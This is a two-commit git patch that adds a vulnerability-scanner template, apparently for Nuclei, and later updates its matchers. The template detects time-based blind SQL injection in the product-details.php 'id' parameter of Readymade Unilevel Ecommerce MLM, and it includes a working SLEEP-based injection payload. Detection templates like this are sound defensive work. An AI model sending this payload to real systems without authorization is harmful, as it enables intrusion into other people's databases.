From d4e2a2be9f18ae524a54f90c339a6ac66eca9713 Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Sat, 3 Aug 2024 04:54:55 +0300
Subject: [PATCH 1/2] add readymade sqli

---
 .../other/readymade-unilevel-sqli.yaml        | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/vulnerabilities/other/readymade-unilevel-sqli.yaml

diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
new file mode 100644
index 00000000000..f4d3e6e5f18
--- /dev/null
+++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
@@ -0,0 +1,29 @@
+id: readymade-unilevel-sqli
+
+info:
+  name: Readymade Unilevel Ecommerce MLM - SQL Injection
+  author: securityforeveryone
+  severity: high
+  description: |
+    Readymade Unilevel Ecommerce software has sql vulnerability in product-details.php?id
+  reference:
+    - https://packetstormsecurity.com/files/179886/ReadyMade-Unilevel-Ecommerce-MLM-Blind-SQL-Injection-Cross-Site-Scripting.html
+  metadata:
+    vendor: i-netsolution
+    product: readymade-unilevel-ecommerce
+  tags: packetstorm,ecommerce,readymade,sqli
+
+http:
+  - raw:
+      - |
+        @timeout 30s
+        GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains(body,"user_login_id") && contains(content_type,"text/html")'
+          - 'status_code == 200'
+        condition: and

From de0719782b5df5e0bbde5388b05109475332c3b8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 24 Aug 2024 06:51:06 +0400
Subject: [PATCH 2/2] updated matcher

---
 http/vulnerabilities/other/readymade-unilevel-sqli.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
index f4d3e6e5f18..882d23d4c8c 100644
--- a/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
+++ b/http/vulnerabilities/other/readymade-unilevel-sqli.yaml
@@ -11,7 +11,7 @@ info:
   metadata:
     vendor: i-netsolution
     product: readymade-unilevel-ecommerce
-  tags: packetstorm,ecommerce,readymade,sqli
+  tags: ecommerce,readymade,sqli
 
 http:
   - raw:
@@ -24,6 +24,7 @@ http:
       - type: dsl
         dsl:
           - 'duration>=6'
-          - 'contains(body,"user_login_id") && contains(content_type,"text/html")'
           - 'status_code == 200'
+          - 'contains(content_type,"text/html")'
+          - 'contains_all(body, "user_login_id", "Products</a>")'
         condition: and